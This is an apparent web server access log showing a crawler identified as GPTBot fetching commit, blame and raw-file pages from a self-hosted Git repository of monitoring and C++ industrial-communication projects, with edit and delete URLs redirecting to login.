- 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/dist/PostgresWatchdog.exe?display=rendered" [Client 74.7.227.38] [Length 10923] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/dist/PostgresWatchdog.exe" +[17/Feb/2026:16:06:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/dist/PostgresWatchdog.exe?display=rendered" [Client 74.7.227.38] [Length 10907] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/dist/PostgresWatchdog.exe" +[17/Feb/2026:16:06:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fgold_monitor_full%2flocalpycs%2fstruct.pyc" [Client 74.7.227.38] [Length 23802] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" +[17/Feb/2026:16:06:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11168] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:16:06:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 11431] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:16:06:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 10180] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:16:06:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 9975] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:16:07:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 30] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:16:07:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:16:07:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 10184] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:16:07:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/performance_comparison.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/performance_comparison.py" +[17/Feb/2026:16:07:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/performance_comparison.py" +[17/Feb/2026:16:07:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/performance_comparison.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/performance_comparison.py" +[17/Feb/2026:16:07:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/performance_comparison.py" +[17/Feb/2026:16:07:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 43] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:16:07:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresPatrol/performance_comparison.py" [Client 74.7.227.38] [Length 18033] [Gzip 9.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/performance_comparison.py" +[17/Feb/2026:16:07:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:16:07:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10082] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:16:07:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/performance_comparison.py" [Client 74.7.227.38] [Length 5415] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/performance_comparison.py" +[17/Feb/2026:16:07:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/performance_comparison.py" [Client 74.7.227.38] [Length 1013] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/performance_comparison.py" +[17/Feb/2026:16:07:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/performance_comparison.py" [Client 74.7.227.38] [Length 9854] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/performance_comparison.py" +[17/Feb/2026:16:07:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:16:07:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 14156] [Gzip 5.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:16:07:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:16:07:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 11822] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:16:07:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 11314] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:16:07:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresPatrol/performance_comparison.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/performance_comparison.py" +[17/Feb/2026:16:07:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresPatrol/performance_comparison.py" +[17/Feb/2026:16:07:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresPatrol/performance_comparison.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/performance_comparison.py" +[17/Feb/2026:16:07:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresPatrol/performance_comparison.py" +[17/Feb/2026:16:07:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 9996] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:16:07:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 9954] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:16:07:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 9953] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:16:07:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 14154] [Gzip 5.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:16:07:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 9987] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:16:07:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 12015] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:16:07:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 12879] [Gzip 5.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:16:07:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 10243] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:16:07:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11169] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:16:07:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 12847] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:16:07:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 9953] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:16:07:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 11314] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:16:07:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 11431] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:16:07:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 12508] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:16:07:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11168] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:16:07:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 10231] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:16:07:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 9953] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:16:07:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 12848] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:16:07:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 9991] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:16:07:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:16:07:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 10234] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:16:07:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] 